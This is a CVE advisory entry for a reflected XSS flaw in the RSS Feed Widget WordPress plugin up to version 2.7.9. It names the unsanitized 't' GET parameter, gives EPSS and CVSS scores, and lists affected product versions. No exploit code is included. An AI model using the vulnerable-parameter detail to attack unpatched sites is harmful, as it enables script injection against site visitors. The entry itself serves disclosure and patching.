Vulnerability Details CVE-2020-24314
Fahad Mahmood RSS Feed Widget Plugin v2.7.9 and lower does not sanitize the value of the "t" GET parameter before echoing it back out inside an input tag. This results in a reflected XSS vulnerability that attackers can exploit with a specially crafted URL.
Exploit prediction scoring system (EPSS) score
EPSS Score 0.002
EPSS Ranking 45.8%
CVSS Severity
CVSS v3 Score 6.1
CVSS v2 Score 4.3
References
Products affected by CVE-2020-24314
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:1.1
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:1.2
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.0
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.0.1
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.1.0
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.2.0
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.2.3
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.3.0
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.3.3
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.1
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.2
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.3
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.4
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.5
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.6
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.7
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.8
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.4.9
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.0
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.1
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.2
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.3
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.4
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.5
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.6
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.7
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.8
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.5.9
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.0
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.1
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.2
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.3
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.4
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.5
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.6
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.7
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.8
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.6.9
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.0
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.1
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.2
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.3
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.4
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.5
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.6
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.7
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.8
-
cpe:2.3:a:rss_feed_widget_project:rss_feed_widget:2.7.9